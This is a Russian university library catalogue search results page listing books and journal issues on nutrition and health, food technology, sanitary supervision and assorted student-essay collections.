Перейти на сайт
библиотеки ОмГТУ
Share |
   
   
   
   
   
   

 
      Виртуальная справка
 
      Личный кабинет

Логин
Пароль
Забыли пароль?
Регистрация

 
      Счетчики
Rambler's Top100
Яндекс цитирования

Сейчас на сайте

63 пользователей


Зарегистрированных: 2 

Миронов Марк Васильевич

Карпова Инна Сергеевна


 
      Наши партнеры
Студенческий информационный портал компании
("Ключевые слова=ПИТАНИЕ - ЗДОРОВЬЕ")
Результаты поиска
СВОДНЫЙ КАТАЛОГ: Найдено записей: 25
1. 
Мартинчик А. Н. Микробиология, физиология питания, санитария [Текст] / А. Н. Мартинчик, А. А. Королев, Ю. В. Несвижский, 2014. - 349 с.
Держатели документа (Информация об экземплярах) 
2. 
Введение в технологию продуктов питания [Текст] / ред. А. П. Нечаев, 2013. - 711 с.
Ключевые слова 
ПИТАНИЕ - ЗДОРОВЬЕ -- ПРОИЗВОДСТВО ПИЩЕВОЕ -- МИКРОБИОЛОГИЯ ПИЩЕВЫХ ПРОДУКТОВ -- ФЕРМЕНТЫ - ПИТАНИЕ -- ПРОИЗВОДСТВО ПИЩЕВОЕ - Сырье -- ДОБАВКА ПИЩЕВАЯ -- АРОМАТИЗАТОР ПИЩЕВОЙ -- КАЧЕСТВО ПИЩЕВЫХ ПРОДУКТОВ -- Технология хлебобулочных изделий -- Технология муки -- Технология крупы -- Технология макаронных изделий -- Технология сахара -- Технология крахмала -- Технология крахмалопродуктов -- Технология кондитерских изделий -- Технология растительных масел -- Технология жиров -- Технология солода -- Технология этилового спирта -- Технология пива -- Технология кваса -- Кислота органическая -- Технология хлебопекарных дрожжей -- Технология ликероводочных изделий -- Технология виноградных вин -- КОНСЕРВИРОВАНИЕ ПИЩЕВЫХ ПРОДУКТОВ -- Технология безалкогольных напитков -- Технология функциональных пищевых продуктов -- БЕЗОПАСНОСТЬ ПРОДУКЦИИ ПИЩЕВОЙ -- БАКАЛАВР - Технолог

В учебном пособии изложен материал курса "Введение в пищевые технологии" для бакалавров, обучающихся по технологическим специальностям в вузах, готовящих специалистов для пищевой и перерабатывающей промышленности. Рассматриваются основные вопросы, связанные с ролью питания в жизни человека, научные основы пищевых технологий, а также сведения, относящиеся к области пищевых технологий: описание сырья, технологических процессов, требования к качеству готовых изделий. В специальных главах даны современные представления о пищевых и биологически активных добавках, ароматизаторах, технологических вспомогательных средствах. Отдельные главы посвящены продуктам здорового питания (функциональным пищевым продуктам) и безопасности пищевых продуктов.

Материал учебного пособия предназначен для студентов вузов, обучающихся по направлениям" Продукты питания из растительного сырья", "Технология продукции и организация общественного питания", "Технология детского и функционального питания" . Книга также будет полезна магистрам, аспирантам и специалистам, заинтересованным в данной проблематике.

3. 
Актуальные проблемы современности: взгляд молодых [Текст] / ред. Л. А. Кочемайкина, 2010. - 267 с.
Ключевые слова 
Оглавление 
  • Баранова, И. Приоритетные направления малого предпринимательства в Омской области / И. Баранова. - с.6-9
    Кл. слова: ОМСКАЯ ОБЛАСТЬ - ПРЕДПРИНИМАТЕЛЬСТВО, ПРЕДПРИНИМАТЕЛЬСТВО МАЛОЕ
  • Билоха, А. Молодежная политика в Омской области / А. Билоха. - с.9-13
    Кл. слова: ОМСКАЯ ОБЛАСТЬ - ПОЛИТИКА МОЛОДЕЖНАЯ, ПОЛИТИКА МОЛОДЕЖНАЯ
  • Литовченко, О. Воспитательная работа в омском колледже предпринимательства и права в рамках молодежной политики г. Омска / О. Литовченко, Ю. Савчук. - с.13-17
    Кл. слова: РАБОТА ВОСПИТАТЕЛЬНАЯ - ССУЗ
  • Москвин, д. Президент в сети / д. Москвин. - с.18-24
    Кл. слова: КОРРУПЦИЯ, ВЛАСТЬ ГОСУДАРСТВЕННАЯ
  • Удод, Д. Поддержка студенческого бизнеса в Омской области / Д. Удод. - с.25-28
    Кл. слова: ОМСКАЯ ОБЛАСТЬ - БИЗНЕС, БИЗНЕС СТУДЕНЧЕСКИЙ
  • Гергерт, О. Уровень жизни как одна из важнейших социально-экономических категорий в Омской области / О. Гергерт. - с.29-33
    Кл. слова: ОМСКАЯ ОБЛАСТЬ - УРОВЕНЬ ЖИЗНИ, УРОВЕНЬ ЖИЗНИ
  • Гизатулин, Р. Порядок формирования и расходования средств регионального бюджета Омской области за 2008-2009 гг. / Р. Гизатулин. - с.33-43
    Кл. слова: ОМСКАЯ ОБЛАСТЬ - БЮДЖЕТ, БЮДЖЕТ РЕГИОНАЛЬНЫЙ
  • Ибрагимов, И. Малое предпринимательство в омской области: функционирование и перспективы развития / И. Ибрагимов, И. Дмитриев. - с.43-46
    Кл. слова: ОМСКАЯ ОБЛАСТЬ - ПРЕДПРИНИМАТЕЛЬСТВО, ПРЕДПРИНИМАТЕЛЬСТВО МАЛОЕ
  • Кампен, В. Роль кредитных организаций в развитии Сибирского региона / В. Кампен. - с.46-49
    Кл. слова: ОРГАНИЗАЦИЯ КРЕДИТНАЯ
  • Клища, Т. Нанотехнологии в России и Сибирском регионе / Т. Клища. - с.50-59
    Кл. слова: НАНОТЕХНОЛОГИЯ
  • Кудря, Г. Демография - социально-экономическая проблема Сибирского федерального округа / Г. Кудря. - с.60-64
    Кл. слова: ДЕМОГРАФИЯ - СИБИРЬ
  • Лямцева, К. Современное состояние ипотечного кредитования в омской области / К. Лямцева. - с.65-72
    Кл. слова: КРЕДИТОВАНИЕ ИПОТЕЧНОЕ, ОМСКАЯ ОБЛАСТЬ - КРЕДИТОВАНИЕ
  • Новиков, К. Управление финансовыми рисками / К. Новиков. - с.72-75
    Кл. слова: РИСК ФИНАНСОВЫЙ, УПРАВЛЕНИЕ РИСКАМИ
  • Панкова, А. Безработица как социально-экономическая проблема Омской области / А. Панкова. - с.75-80
    Кл. слова: БЕЗРАБОТИЦА - ОМСКАЯ ОБЛАСТЬ
  • Степанова, К. Развитие рынка лизинговых услуг в сибирском регионе / К. Степанова. - с.81-88
    Кл. слова: УСЛУГА ЛИЗИНГОВАЯ, ЛИЗИНГ - СИБИРЬ
  • Татрицкая, Л. Сравнительный анализ услуг Омских банков по ипотечному кредитованию физических лиц / Л. Татрицкая, Т. Ошовская. - с.89-92
    Кл. слова: КРЕДИТОВАНИЕ ИПОТЕЧНОЕ
  • Тюлебаева, С. Анализ условий предоставления банковских услуг предприятиям малого бизнеса в Омском регионе / С. Тюлебаева. - с.92-98
    Кл. слова: УСЛУГА БАНКОВСКАЯ, ПРЕДПРИНИМАТЕЛЬСТВО МАЛОЕ
  • Зубенко, А. Создание клиент-сервисной базы данных "Учёт и реализация товаров продуктовым магазином" / А. Зубенко. - с.99-103
    Кл. слова: БАЗА ДАННЫХ КЛИЕНТ-СЕРВИСНАЯ, УЧЕТ ТОВАРОВ, МАГАЗИН ПРОДУКТОВЫЙ
  • Лепилина, В. Зависимость молодёжи от компьютерных игр / В. Лепилина, Ю. Климова. - с.104-110
    Кл. слова: ЗАВИСИМОСТЬ КОМПЬЮТЕРНАЯ, ИГРА КОМПЬЮТЕРНАЯ
  • Соловьёв, Д. Исследование зависимости от социальных сетей / Д. Соловьёв, И. Дементьев. - с.111-117
    Кл. слова: СЕТЬ СОЦИАЛЬНАЯ, ЗАВИСИМОСТЬ КОМПЬЮТЕРНАЯ
  • Харламова, А. Организация электронной торговли и перспективы ее развития / А. Харламова. - с.117-124
    Кл. слова: ТОРГОВЛЯ ЭЛЕКТРОННАЯ
  • Шатц, Е. Использование теории массового обслуживания для расчёта эффективности работы супермаркета / Е. Шатц. - с.125-131
    Кл. слова: ТЕОРИЯ МАССОВОГО ОБСЛУЖИВАНИЯ, ЭФФЕКТИВНОСТЬ РАБОТЫ СУПЕРМАРКЕТА
  • Богачёв, М. Использование новых видов продукции при приготовлении блюд из рыб / М. Богачёв. - с.132-135
    Кл. слова: БЛЮДА РЫБНЫЕ
  • Бутникова, К. Изучение влияния отдельных компонентов газированной воды на здоровье человека / К. Бутникова, Ю. Ушакова. - с.136-147
    Кл. слова: ЗДОРОВЬЕ ЧЕЛОВЕКА, ВОДА ГАЗИРОВАННАЯ
  • Грязнов, С. Исследование качественного состава варёных колбас некоторых омских производителей / С. Грязнов, В. Климов. - с.147-149
    Кл. слова: КОЛБАСА ВАРЕНАЯ
  • Еринова, Т. Лунная кулинария / Т. Еринова. - с.150-154
    Кл. слова: КУЛИНАРИЯ ЛУННАЯ
  • Позднякова, А. Удивительные свойства воды / А. Позднякова. - с.155-160
    Кл. слова: ВОДА, БАЛАНС ВОДНЫЙ
  • Сердцева, Т. Здоровое питание в борьбе со стрессом в современной жизни студентов / Т. Сердцева. - с.160-170
    Кл. слова: ПИТАНИЕ - ЗДОРОВЬЕ, ПИТАНИЕ СТУДЕНТОВ, ПИТАНИЕ - СТРЕСС
  • Автюхова, Ю. Медали Великой отечественной войны / Ю. Автюхова. - с.171-179
    Кл. слова: МЕДАЛЬ, ВОЙНА ВЕЛИКАЯ ОТЕЧЕСТВЕННАЯ
  • Бородавко, О. Танк Т-34 - оружие победы / О. Бородавко. - с.180-184
    Кл. слова: ТАНК Т-34
  • Кирьянова, Л. Автомат Калашникова / Л. Кирьянова. - с.184-187
    Кл. слова: АВТОМАТ КАЛАШНИКОВА
  • Кучеренко, Р. Гуманизм советского народа глазами немецких солдат / Р. Кучеренко. - с.188-191
  • Маслова, В. Гражданская авиация в годы Великой Отечественной войны / В. Маслова. - с.191-199
    Кл. слова: АВИАЦИЯ ГРАЖДАНСКАЯ, ВОЙНА ВЕЛИКАЯ ОТЕЧЕСТВЕННАЯ
  • Молдахметов, К. Вклад казахского народа в победу / К. Молдахметов. - с.200-202
    Кл. слова: КАЗАХСТАН - ИСТОРИЯ
  • Понкрашин, С. Великая оболганная война / С. Понкрашин. - с.203-206
    Кл. слова: ВОЙНА ВЕЛИКАЯ ОТЕЧЕСТВЕННАЯ
  • Позднякова, А. Омск в годы великой Отечественной войны / А. Позднякова. - с.206-209
    Кл. слова: ОМСК - ИСТОРИЯ
  • Свинцицкий, А. Социально-психологичсекие аспекты жизни блокадного Ленинграда / А. Свинцицкий. - с.209-214
    Кл. слова: БЛОКАДА ЛЕНИНГРАДА, ЛЕНИНГРАД - ИСТОРИЯ, АСПЕКТ СОЦИАЛЬНО-ПСИХОЛОГИЧЕСКИЙ
  • Шарапова, М. Фронтовой быт в годы Великой Отечественной войны / М. Шарапова. - с.214-216
    Кл. слова: БЫТ ФРОНТОВОЙ
  • Шнайдер, Е. Российские немцы в годы Великой Отечественной войны / Е. Шнайдер. - с.217-222
    Кл. слова: НАРОДЫ РОССИИ
  • Бутникова, К. Снижение интереса к чтению - актуальная проблема современного общества / К. Бутникова. - с.223-226
    Кл. слова: ЧТЕНИЕ, ИНТЕРЕС
  • Обабкова, Я. Социологический портрет студента колледжа / Я. Обабкова, Я. Евдокимова. - с.227-232
    Кл. слова: СТУДЕНТ КОЛЛЕДЖА, ПОРТРЕТ СОЦИОЛОГИЧЕСКИЙ
  • Плеханова, Г. Социальные проблемы российской молодежи / Г. Плеханова. - с.232-237
    Кл. слова: МОЛОДЕЖЬ - РОССИЯ, ПРОБЛЕМА СОЦИАЛЬНАЯ
  • Романова, К. Образ семьи и добрачных отношений в русской песне как отражение нравственных основ народ / К. Романова. - с.237-243
    Кл. слова: ОТНОШЕНИЯ ДОБРАЧНЫЕ, СЕМЬЯ, НРАВСТВЕННОСТЬ
  • Федулова, Н. Основные тенденции и противоречия современной семьи в представлении студентов колледжа / Н. Федулова. - с.244-249
    Кл. слова: СЕМЬЯ
  • Харламова, А. Социокультурные проблемы и тенденции творческого развития молодежи крупного сибирского города / А. Харламова. - с.250-260
    Кл. слова: СРЕДА КУЛЬТУРНАЯ, ТВОРЧЕСТВО, МОЛОДЕЖЬ
  • Христус, А. Субкультуры в молодёжном движении Омска и области / А. Христус. - с.260-267
    Кл. слова: СУБКУЛЬТУРА
Держатели документа (Информация об экземплярах) 
4. 
Доценко В. А. Практическое руководство по санитарному надзору за предприятиями пищевой и перерабатывающей промышленности, общественного питания и торговли [Текст] / В. А. Доценко, 2013. - 831 с.
Ключевые слова 
НАДЗОР САНИТАРНО-ЭПИДЕМИОЛОГ -- ПИТАНИЕ - ЗДОРОВЬЕ -- ПИТАНИЕ ОБЩЕСТВЕННОЕ - Надзор -- Паспорт санитарный -- ЭКСПЕРТИЗА САНИТАРНО-ЭПИДЕМИ -- ПИТАНИЕ ЛЕЧЕБНО-ПРОФИЛАКТИЧЕСКОЕ -- ПИТАНИЕ ДИЕТИЧЕСКОЕ -- ПИТАНИЕ ДЕТЕЙ -- ПИТАНИЕ ПОДРОСТКОВ -- МАГАЗИН продовольственный -- РЫНОК ПРОДОВОЛЬСТВЕННЫЙ -- ПРЕДПРИЯТИЕ ПИЩЕВОЙ ПРОМЫШЛЕННОСТИ -- ПРЕДПРИЯТИЕ ПЕРЕРАБАТЫВАЮЩЕЕ -- ДОБАВКА ПИЩЕВАЯ -- ДОБАВКА БИОЛОГИЧЕСКИ АКТИВНАЯ -- Продукт органический -- СРОК ГОДНОСТИ ПИЩЕВЫХ ПРОДУКТОВ -- Условия хранения пищевых продуктов -- ОТРАВЛЕНИЕ ПИЩЕВОЕ
Оглавление 
  • СанПин 2.3.2.1078-01. Гигиенические требования безопасности и пищевой ценности пищевых продуктов. - с.681-755
  • Федеральный закон "О защите прав юридических лиц и индивидуальных предпринимателей при осуществлении государственного контроля (надзора) и муниципального надзора". - с.756-780
  • Правила предоставления уведомлений о начале осуществления отдельных видов предпринимательской деятельности и учета оказанных уведомлений. - с.782-784
  • Формы основных административных регламентов Роспотребнадзора по проведению проверок пищевых предприятий. - с.787-815
  • Порядок оказания медицинской помощи населению по профилю "Диетология". - с.816-823
  • Основы государственной политики Российской Федерации в области здорового питания населения на период до 2020 года. - с.824-827
  • Утвержденные методы определений контролируемых показателей. - с.828-831
Держатели документа (Информация об экземплярах) 
5. 
Позняковский В. М. Безопасность продовольственных товаров (с основами нутрициологии) [Текст] / В. М. Позняковский, 2015. - 270 с.
Ключевые слова 
БЕЗОПАСНОСТЬ ПРОДОВОЛЬСТВЕННЫХ ТОВАРОВ -- ТОВАРЫ ПРОДОВОЛЬСТВЕННЫЕ -- НУТРИЦИОЛОГИЯ -- ПИТАНИЕ - НАУКА -- ПИТАНИЕ РАЦИОНАЛЬНОЕ -- ПИТАНИЕ СБАЛАНСИРОВАННОЕ -- ПРОДУКТЫ СПЕЦИАЛЬНОГО НАЗНАЧЕНИЯ -- НОРМА ПОТРЕБЛЕНИЯ ПИЩИ -- ПИТАНИЕ - ЗДОРОВЬЕ -- ЗАГРЯЗНЕНИЕ ПРОДОВОЛЬСТВЕННОГО СЫРЬЯ -- ИНТОКСИКАЦИЯ -- ТОКСИКОИНФЕКЦИЯ -- МИКОТОКСИНЫ -- ЗАГРЯЗНЕНИЕ ХИМИЧЕСКОЕ -- ВЕЩЕСТВО АНТИБАКТЕРИАЛЬННОЕ -- ПРЕПАРАТ ГОРМОНАЛЬНЫЙ -- ДОБАВКА КОРМОВАЯ АЗОТСОДЕРЖАЩАЯ -- ЗАГРЯЗНЕНИЕ ТОКСИЧЕСКОЕ -- ПЕСТИЦИДЫ -- РЕГУЛЯТОР РОСТА РАСТЕНИЙ -- УДОБРЕНИЕ -- ВОДЫ СТОЧНЫЕ -- НИТРАТЫ -- ЗАГРЯЗНЕНИЕ РАДИОАКТИВНОЕ -- ДОБАВКА ПИЩЕВАЯ -- КОНСЕРВАНТ ПИЩЕВОЙ -- БАД -- ПРОДУКТ ГЕНЕТИЧЕСКИ МОДИФИЦИРОВАННЫЙ -- ГМИ -- ФАЛЬСИФИКАЦИЯ ПИЩЕВЫХ ПРОДУКТОВ -- БЕЗОПАСНОСТЬ ПИЩЕВЫХ ПРОДУКТОВ -- КАЧЕСТВО ПИЩЕВЫХ ПРОДУКТОВ -- СТАНДАРТ МЕЖДУНАРОДНЫЙ -- ПИТАНИЕ ЖЕНЩИН БЕРЕМЕННЫХ -- ПИТАНИЕ ДЕТЕЙ -- ПИТАНИЕ ПОДРОСТКОВ
Держатели документа (Информация об экземплярах) 
6. 
Питание и общество. - Журнал, 2006г. № 2
Оглавление 
  • Богданова, О. Правильное питание ребенка - здоровая страна / О. Богданова, Ю. Колыванова
    Кл. слова: ПИТАНИЕ - ЗДОРОВЬЕ
7. 
Пищевая промышленность. - Журнал, 2004г. № 5
Оглавление 
  • Тутельян, В. А. Питание и здоровье / В. А. Тутельян. - с.6-7
    Кл. слова: ПИТАНИЕ - ЗДОРОВЬЕ
  • Кочеткова, А. А. Соки и напитки в российской научной программе "Технологии живых систем" / А. А. Кочеткова, А. Ю. Колеснов. - с.8-11
  • Михеева, Г. А. Вкусоароматические компоненты витаминизированных напитков и киселей / Г. А. Михеева, В. М. Воробьева. - с.12-13
  • Лейн, Т. Е. Упакованный холодный чай (Ice - Tea) как перспективный продукт для российского рынка / Т. Е. Лейн. - с.14
    Кл. слова: ЧАЙ - ТОРГОВЛЯ, Чай холодный
  • Шулбаева, М. Т. Сохранение традиционных качеств пищевых продуктов при использовании пищевых волокон / М. Т. Шулбаева, К. Л. Коновалов. - с.16-17
  • Использование люпиновой муки при изготовлении макаронных изделий / ; Е. В. Петрова, Н. К. Казеннова, А. А. Глазунов, Т. И. Шнейдер. - с.18-20
    Кл. слова: ИЗДЕЛИЯ МАКАРОННЫЕ, мука люпиновая
  • Росляков, Ю. Ф. Цветокорректирующие добавки для макаронных изделий профилактического действия / Ю. Ф. Росляков, И. И. Уварова, Н. А. Шмалько. - с.21
  • Беспалов, В. В. Витаминно-минеральный премикс "Флагман" для обогащения хлебобулочных изделий / В. В. Беспалов. - с.22
  • Журавко, Е. В. Мука зародышей пшеницы для производства функциональных продуктов питания / Е. В. Журавко, Е. В. Грузинов, Е. И. Кострова. - с.23
  • Коновалов, К. Л. Микрокристаллическая целлюлоза в мясопродуктах / К. Л. Коновалов. - с.24
  • Рисовые продукты для консервов здорового питания / ; З. А. Троян, Л. В. Лычкина, Н. Н. Корастилева, С. Ю. Жажский. - с.25
  • Подкорытова, А. В. Морские водоросли - уникальное сырье для обогащения продуктов питания / А. В. Подкорытова. - с.27
    Кл. слова: ВОДОРОСЛИ МОРСКИЕ
  • Карагодин, В. П. Истинные и мнимые свойства БАД глазами экспертов / В. П. Карагодин, Р. М. Салимов, А. Н. Орехов. - с.29-31
    Кл. слова: ДОБАВКА БИОЛОГИЧЕСКИ АКТИВНА
  • Михалев, А. А. Состояние и перспективы развития агропромышленного рынка России / А. А. Михалев. - с.32-34
  • Козин, Е. Б. Пообъектное формирование затрат / Е. Б. Козин, Т. А. Козина, Л. И. Шпилев. - с.36-37
    Кл. слова: ЗАТРАТЫ - предприятие пищевое
  • Маламуд, Д. Б. Теоретические основы создания устойчивого экономического развития / Д. Б. Маламуд. - с.38-40
  • Жапаров, К. Ж. Конкурентоспособность агропродукции Республики Казахстан / К. Ж. Жапаров. - с.41
  • Большаков, О. В. Методы сравнительной оценки функционирования научных организаций АПК / О. В. Большаков, Я. Г. Гараев, В. Г. Киселев. - с.42-45
  • Минаева, Е. В. Методы управления производством зерна в развитых странах мира / Е. В. Минаева, А. С. Чижик. - с.46-47
    Кл. слова: ЗЕРНО - производство
  • Чубенко, Н. Т. Хлебопекарная промышленность России в 1980-1990 годы / Н. Т. Чубенко. - с.48-49
  • Тужилкин, В. И. Дополнительное профессиональное образование возраждается / В. И. Тужилкин, В. С. Сергунов. - с.50-51
    Кл. слова: ОБРАЗОВАНИЕ ДОПОЛНИТЕЛЬНОЕ, ОБРАЗОВАНИЕ ПРОФЕССИОНАЛЬНОЕ, ПЕРЕПОДГОТОВКА преподавателей
  • Зелинский, Г. С. Технические регламенты на производство хлебопродуктов / Г. С. Зелинский. - с.52
  • Новожилова, О. А. Эксплуатация и обслуживание прачечного оборудования на предприятиях пищевой промышленности / О. А. Новожилова. - с.62-63
    Кл. слова: ОБОРУДОВАНИЕ ПРОМЫШЛЕННОЕ, Оборудование прачечное
  • Хода, Е. Г. Вакуумная упаковка пищевых продуктов в стеклянную тару системы "твист-офф" / Е. Г. Хода, Е. М. Тихонова. - с.70-71
    Кл. слова: ТАРА стеклянная
  • Чулюков, О. Г. Технологический контроль качества молочной продукции методом ближней инфракрасной спектроскопии / О. Г. Чулюков, . М. Кузьмичева, В. Г. Блиадзе. - с.76-77
    Кл. слова: КОНТРОЛЬ КАЧЕСТВА ПРОДУКЦИИ, ПРОДУКЦИЯ молочная
  • Проселков, В. Г. Российская система ХАССП: внедрение и сертификация / В. Г. Проселков. - с.80-81
  • Силаев, А. В. Низкокалорийный подсластитель. Вопросы практического применения в пищевой промышленности / А. В. Силаев, И. В. Тихонова, Ю. Г. Сметанина. - с.88-90
  • Беличенко, А. М. Союз производителей безалкогольных напитков / А. М. Беличенко. - с.104
  • Антонов, А. А. Союз предприятий холодильной промышленности / А. А. Антонов. - с.105
  • Российской академии сельскохозяйственных наук - 75 лет. - с.107
Держатели документа (Информация об экземплярах) 
8. 
СОЦИС (Социологические исследования). - Журнал, 2007г. № 5
Оглавление 
  • Беляева, Л. А. И вновь о среднем классе России / Л. А. Беляева. - с.3-13
    Кл. слова: СРЕДНИЙ КЛАСС - РОССИЯ
  • Беленький, В. Х. Российский высший класс: проблема идентификации / В. Х. Беленький. - с.13-21
    Кл. слова: высший класс - Россия
  • Смирнова, Т. В. О профессиональных деструкциях в пожилом возрасте / Т. В. Смирнова. - с.21-28
    Кл. слова: деструкции профессиональные
  • Бурнышев, К. В. Управление инновациями на предприятии: новые контексты и старые проблемы / К. В. Бурнышев, И. В. Донова. - с.31-37
    Кл. слова: УПРАВЛЕНИЕ ИННОВАЦИЯМИ
  • Гончарова, Н. В. Интеграция линейного менеджмента в управленческую иерархию / Н. В. Гончарова. - с.37-46
    Кл. слова: ИЕРАРХИЯ УПРАВЛЕНЧЕСКАЯ
  • Чеглакова, Л. М. Изменения в практике управления персоналом на современных промышленных предприятиях / Л. М. Чеглакова. - с.46-53
    Кл. слова: УПРАВЛЕНИЕ ПЕРСОНАЛОМ - ПРАК
  • Бизюков, П. В. Служба управления персоналом: функции, типология, модели / П. В. Бизюков. - с.53-61
    Кл. слова: СЛУЖБА УПРАВЛЕНИЯ ПЕРСОНАЛОМ
  • Попков, Ю. В. Народы Сибири в социокультурном пространстве Евразии: ценностные предпочтения и межэтнические установки / Ю. В. Попков, В. Г. Костюк, Е. А. Тюгашев. - с.62-69
    Кл. слова: НАРОДЫ СИБИРИ
  • Южанин, М. А. О социокультурной адаптации в иноэтнической среде: концептуальные подходы к анализу / М. А. Южанин. - с.70-77
    Кл. слова: АДАПТАЦИЯ СОЦИОКУЛЬТУРНАЯ, СРЕДА ИНОЭТНИЧЕСКАЯ
  • Миронов, Б. Н. Еврейская диаспора в России (по материалам всероссийской переписи 2002 г.) / Б. Н. Миронов. - с.78-80
    Кл. слова: ЕВРЕИ - РОССИЯ
  • Пиетиля, И. Российское здравоохранение: ожидания населения / И. Пиетиля, А. П. Дворянчикова, Л. С. Шилова. - с.81-88
    Кл. слова: ЗДРАВООХРАНЕНИЕ
  • Щенникова, Н. В. Питание россиян как фактор жизнеспособности нации / Н. В. Щенникова, Е. В. Шеметова. - с.88-94
    Кл. слова: ПИТАНИЕ - ЗДОРОВЬЕ
  • Ижикова, Н. В. Культура и плитика. Методологические проблемы / Н. В. Ижикова. - с.95-103
    Кл. слова: КУЛЬТУРА - ПОЛИТИКА
  • Симонова, В. В. / В. В. Симонова : 103-113
    Кл. слова: ТРАНССИБ
Держатели документа (Информация об экземплярах) 
9. 
Основы безопасности жизнедеятельности. - Журнал, 2008г. № 5
Оглавление 
  • Кадрматов, Р. Печальный памятник эпохи: прошло 22 года после Чернобыльской катастрофы / Р. Кадрматов. - с.8-15
    Кл. слова: ЧЕРНОБЫЛЬ
  • Микрюков, В. Терроризм как социальное явление: ученые дискутируют / В. Микрюков. - с.16-19
    Кл. слова: БОРЬБА С ТЕРРОРИЗМОМ
  • Шагапова, Г. Рациональное питание и здоровье / Г. Шагапова, С. Хусаенова. - с.20-23
    Кл. слова: ПИТАНИЕ - ЗДОРОВЬЕ, ПИТАНИЕ ДЕТЕЙ - КАЧЕСТВО
  • Утков, Ю. Воспитание чувства улицы: методические рекомендации по обучению детей / Ю. Утков, В. Володарская. - с.24-28
    Кл. слова: ПРАВИЛА ДОРОЖНОГО ДВИЖЕНИЯ, МЕТОДИКА ПРЕПОДАВАНИЯ ПДД
  • Моисеев, В. Информационно-телекоммуникационные технологии для формирования культуры безопасности жизнедеятельности / В. Моисеев, К. Таранцева, Н. Бубнова. - с.42-47
    Кл. слова: ТЕХНОЛОГИИ ИНФОРМАЦИОННЫЕ, ТЕХНОЛОГИИ ДИСТАНЦИОННЫЕ
  • Головин, Н. "ОБЖ - Подготовка к жизни": инновационная программа подготовки учащихся / Н. Головин, О. Соловьева. - с.51-57
    Кл. слова: ПРОГРАММА ОБРАЗОВАТЕЛЬНАЯ, ОБЖ
10. 
Гришина Ю. И. Общая физическая подготовка: знать и уметь [Текст] : учеб. пособие для студентов высш. учеб. заведений / Ю. И. Гришина, 2010. - 249 с.
Держатели документа (Информация об экземплярах) 
11. 
Физическая культура. 10-11 классы [Текст] : сб. элективных курсов / авт. сост.: А. Н. Каинов, Г. И. Курьерова, Е. Г. Хаустова, 2009. - 213 с.
Держатели документа (Информация об экземплярах) 
12. 
Румянцева Е. Е. Товары, вредные для здоровья [Текст] : научно-популярная литература / Е. Е. Румянцева, 2005. - 390 с.
Держатели документа (Информация об экземплярах) 
13. 
Доценко В. А. Санитарно-эпидемиологический надзор в общественном питании [Текст] : справочник / В. А. Доценко, В. В. Власова, 2004. - 590 с.
Держатели документа (Информация об экземплярах) 
14. 
Политика здорового питания [Текст] : Федеральный и региональный уровни, 2002. - 342 с.
Ключевые слова 
ПИТАНИЕ РАЦИОНАЛЬНОЕ -- Питание человека -- ВЕЩЕСТВА пищевые -- ПИЩА -- БЕЗОПАСНОСТЬ ПИЩЕВЫХ ПРОДУКТ -- Микотоксины -- ПИТАНИЕ - ЗДОРОВЬЕ -- Контроль гигиенический -- ФАЛЬСИФИКАЦИЯ продуктов -- Статус пищевой -- ЗДОРОВЬЕ НАСЕЛЕНИЯ - россия -- микронутриенты -- ВИТАМИНЫ - питание -- КАЛЬЦИЙ - ПИТАНИЕ -- МАГНИЙ - ПИТАНИЕ -- ЖЕЛЕЗО - ПИТАНИЕ -- ЙОД - ПИТАНИЕ -- СЕЛЕН - ПИТАНИЕ -- МИКРОЭЛЕМЕНТЫ - ПИТАНИЕ -- ВОЛОКНО пищевое -- ДЕФИЦИТ витаминный -- ПИЩА - ЭКОЛОГИЯ -- БЕЗОПАСНОСТЬ ПРОДОВОЛЬСТВЕНН -- БАД -- ДОБАВКА ПИЩЕВАЯ -- ПИТАНИЕ ЗДОРОВОЕ -- ПИТАНИЕ ДЕТЕЙ -- ПИТАНИЕ ШКОЛЬНИКОВ -- РАСТЕНИЯ ТРАНСГЕННЫЕ -- ГЕНЕТИКА РАСТЕНИЙ -- ПИТАНИЕ ЛЕЧЕБНОЕ -- Питание - словарь терминов
Держатели документа (Информация об экземплярах) 
15. 
Покорн Д. Полная энциклопедия лечебного питания [Текст] : энциклопедия / Д. Покорн, 1998. - 574,[1] с.
Ключевые слова 
ПИТАНИЕ ЛЕЧЕБНОЕ -- Гигиена питания -- ПИТАНИЕ ЗДОРОВОЕ -- Питание - здоровье -- Питание сбалансированное -- БЕЛКИ - питание -- СОСТАВ ХИМИЧЕСКИЙ ПРОДУКТОВ -- САХАР - питание -- ЖИРЫ - питание -- ВИТАМИНЫ -- Натрий - питание -- Калий - питание -- Кальций - питание -- Магний - питание -- Фосфор - питание -- Микроэлементы - питание -- Йод - питание -- Фтор - питание -- Железо - питание -- Цинк - питание -- Селен - питание -- Медь - питание -- Хром - питание -- Клетчатка - питание -- ВОДА - питание -- Диета геропрофилактическая -- Диета молочная -- Диета рыбная -- Вегетаринство -- Питание макробиотическое -- Гастрономия -- Питание женщин беременных -- ПИТАНИЕ ДЕТЕЙ -- ПИТАНИЕ УЧАЩИХСЯ -- Питание спортсменов -- ПИТАНИЕ ПОЖИЛЫХ ЛЮДЕЙ -- Питание диетотерапевтическое -- ДИЕТА ЛЕЧЕБНАЯ -- КОРМЛЕНИЕ -- ОБМЕН ВЕЩЕСТВ - нарушения -- Диабет сахарный -- Гипогликемия -- Остеопороз -- Диета для похудения -- Анемия -- Аллергия пищевая -- Авитаминоз -- Ожирение -- ПОСТ православный -- Сбор лекарственный -- РАСТЕНИЯ ЦЕЛЕБНЫЕ
Держатели документа (Информация об экземплярах) 
16. 
Социально значимые проблемы современного общества [Текст] : сб. научных трудов докторантов, аспирантов и соискателей учен. степ. канд. наук / Омский экономический ин-т, 2005. - 134 с.
Оглавление 
  • Пасько, О. В. Подбор состава микрофлоры закваски для комбинированного кисломолочного продукта специального назначения / О. В. Пасько, Н. Б. Гаврилова. - с.3-9
  • Пьянова, О. А. Нормативно-правовые основы воссоздания революционных трибуналов Западной Сибири, сентябрь 1919 г. - июнь 1921 г. / О. А. Пьянова. - с.10-20
  • Ветренко, И. А. Игра как социальная модель в эпоху глобализации современного общества / И. А. Ветренко. - с.21-25
  • Стаурский, Е. С. Значение финансово-промышленных групп в инновационном развитии региона / Е. С. Стаурский. - с.26-30
    Кл. слова: ФПГ, ГРУППА ФИНАНСОВО-ПРОМЫШЛЕННА
  • Тимко, С. А. Образ сотрудника органов внутренних дел в современной художественной литературе / С. А. Тимко, А. А. Урусов. - с.31-36
  • Никульченкова, Е. В. Конвенция о правах ребенка как основной международно-правовой акт в области защиты прав детей / Е. В. Никульченкова. - с.37-48
    Кл. слова: ЗАЩИТА ПРАВ РЕБЕНКА
